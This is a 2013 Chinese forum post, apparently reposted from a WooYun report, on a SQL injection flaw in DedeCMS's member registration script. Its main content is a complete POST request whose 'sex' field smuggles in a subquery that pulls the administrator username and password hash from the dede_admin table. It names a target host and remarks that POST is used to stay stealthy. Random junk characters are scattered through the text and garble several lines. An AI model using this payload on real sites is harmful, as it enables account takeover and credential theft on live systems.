漏洞类型: SQL注射漏洞( e, J# ?- Y. R4 B- C1 F1 T1 I
简要描述:; ^0 P( j! p z/ k
" A; \' \& v3 D- Q/ M V
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
b4 @$ Q# J, r0 D& s% T4 p原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.7 a$ q0 d- _; T5 [5 W) i
详细说明:跟这个漏洞% L' ?( m$ U% {' T( N
. y# l, |9 r' y# Y8 U! d5 rWooYun: Dedecms SQL注射导致审核机制绕过漏洞
0 }2 L0 e" E$ y: m2 i8 h; g是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的. W6 l9 \; D+ V( N) p8 L
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
/ V8 U/ G7 R( A+ j( X
+ d7 a4 t& q1 X2 m, Vwww.political-security.com/member/reg_new.php3 m5 K4 U8 Q! @7 I: x& r
! k& t1 S2 \' G1 h* a& ^# m( ^POST
2 \% j; I5 @& }( ?1 f
. p+ v& r& F' }* E8 d8 h8 ldopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&, ^. Q! {. q2 W
userid=c4rp3nt3r&uname=c4rp3nt3r
d' C+ k- Q, @/ X7 W0 F&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss5 ]7 |) O0 n7 r: t
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
9 r2 ^2 ?! i! D( }6 S(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
. j0 A8 P) B m3 M! A3 x%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对